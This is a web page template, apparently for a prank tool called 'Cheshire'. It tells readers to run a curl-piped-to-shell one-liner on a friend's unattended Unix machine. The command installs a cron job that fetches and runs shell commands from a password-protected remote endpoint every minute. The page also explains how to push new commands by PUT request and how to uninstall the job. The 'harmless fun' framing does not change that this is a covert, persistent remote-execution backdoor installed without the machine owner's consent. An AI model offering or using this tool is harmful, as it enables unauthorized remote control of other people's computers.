extends layout

block content
  p Welcome to Cheshire, the simplest way to cause some harmless mischief for
    | your friends who run *nix machines and leave them unattended.
  p Cheshire provides a one-stop solution for discreet remote access to a
    | machine, perfect for popping up videos like 
    a(href="http://www.youtube.com/watch?v=eh7lp9umG2I") this
    |  or 
    a(href="http://www.youtube.com/watch?v=LbXiECmCZ94") this
    |  by installing a cron job that runs on the minute, fetching and executing
    | shell commands from a unique password-protected endpoint that you have
    | access to.

  h2 Get Started
  p When your target leaves their computer unattended, simply pick a unique name
    | for their box and execute the following command:
    pre sh<(curl -s #{host}:#{port}/install/[name])
    | and provide a password. This will set up an endpoint at 
    code #{host}:#{port}/scripts/[name]
    |  which will hold your script-lets. By default, it contains
    pre touch /tmp/cheshire
    | so if your target is going to be away from their computer on the next
    | changing of the minute, you can verify that Cheshire was installed
    | successfully.
  p Each script-let can only be fetched once (this is enforced server-side), to
    | prevent the same script from being executed repeatedly. To add a new
    | script, send a 
    code PUT
    |  request (that's right, we use 
    code PUT
    | ) to 
    code #{host}:#{port}/scripts/[name]
    |  with 
    code password=[password]
    |  and 
    code contents=[script contents]
    |  as 
    strong form
    |  parameters, not query parameters. Alternatively, try 
    a(href="/update") this
    |  handy online form.
  p When your friend demands that you fix their computer (possibly threatening
    | you, too), or the novelty has worn off, you can simply execute
    pre sh <(curl -s #{host}:#{port}/uninstall/name)
    | Because this removes the endpoint on the server, too, you need the
    | endpoint password for this.

  h2 Does it work?
  p Judge for yourself:
  img(src="/images/results.png")

  h2 Security, Trust, Legal, etc.
  p There's a lot of issues here. Don't do anything bad.
  p More seriously, this was a project written solely for fun. Please don't use
    | it to do anything malicious/illegal. You shouldn't use it on someone you
    | don't know, and you shouldn't do anything mean. Just have some harmless fun.
  p In terms of security, there are a lot of obvious issues. Scripts are
    | uploaded and downloaded using HTTP, which is unecrypted, so this is
    | vulnerable to man-in-the-middle attacks. Passwords are also transmited
    | unencrypted. They're stored using Bcrypt, but still you shouldn't be using
    | any passwords you use elsewhere. Etc.
  p I am not a lawyer but I'm pretty sure this isn't a sufficient disclaimer to
    | get me off the hook if someone causes real trouble, so don't do that.
  
  h2 Acknowledgements
  p Thanks to Mason Silber and Dina Lamdany for the inspiration.
